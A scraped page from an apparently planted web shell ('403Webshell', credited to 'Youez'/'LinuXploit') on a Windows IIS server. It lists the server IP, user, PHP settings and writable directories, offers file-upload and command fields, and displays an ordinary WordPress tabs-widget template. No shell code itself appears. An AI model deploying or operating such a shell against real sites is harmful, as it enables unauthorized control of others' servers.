403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Old Sites/ict/wp-content/plugins/so-widgets-bundle/widgets/tabs/tpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Old Sites/ict/wp-content/plugins/so-widgets-bundle/widgets/tabs/tpl/default.php
<?php
/**
 * @var array $args
 * @var array $instance
 * @var array $tabs
 * @var array $initial_tab_index
 */
if ( ! empty( $instance['title'] ) ) {
	echo $args['before_title'] . $instance['title'] . $args['after_title'];
}
?>
<div class="sow-tabs">
	<div class="sow-tabs-tab-container" role="tablist">
	<?php foreach ( $tabs as $i => $tab ) { ?>
		<div
			class="sow-tabs-tab<?php if ( $i == $initial_tab_index ) {
				echo ' sow-tabs-tab-selected';
			} ?>"
			role="tab"
			data-anchor="<?php echo sanitize_title_with_dashes( $tab['anchor'] ); ?>"
			aria-selected="<?php echo $i == $initial_tab_index ? 'true' : 'false'; ?>"
			tabindex="0"
		>
			<div class="sow-tabs-title <?php echo empty( $tab['after_title'] ) ? 'sow-tabs-title-icon-left' : 'sow-tabs-title-icon-right'; ?>">
				<?php echo $tab['before_title']; ?>
				<?php echo wp_kses_post( $tab['title'] ); ?>
				<?php echo $tab['after_title']; ?>
			</div>
		</div>
	<?php } ?>
	</div>

	<div class="sow-tabs-panel-container">
	<?php foreach ( $tabs as $i => $tab ) { ?>
		<div class="sow-tabs-panel">
			<div
				class="sow-tabs-panel-content"
				role="tabpanel"
				aria-hidden="<?php echo $i != $initial_tab_index ? 'true' : 'false'; ?>"
			>
				<?php $this->render_panel_content( $tab, $instance ); ?>
			</div>
		</div>
	<?php } ?>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit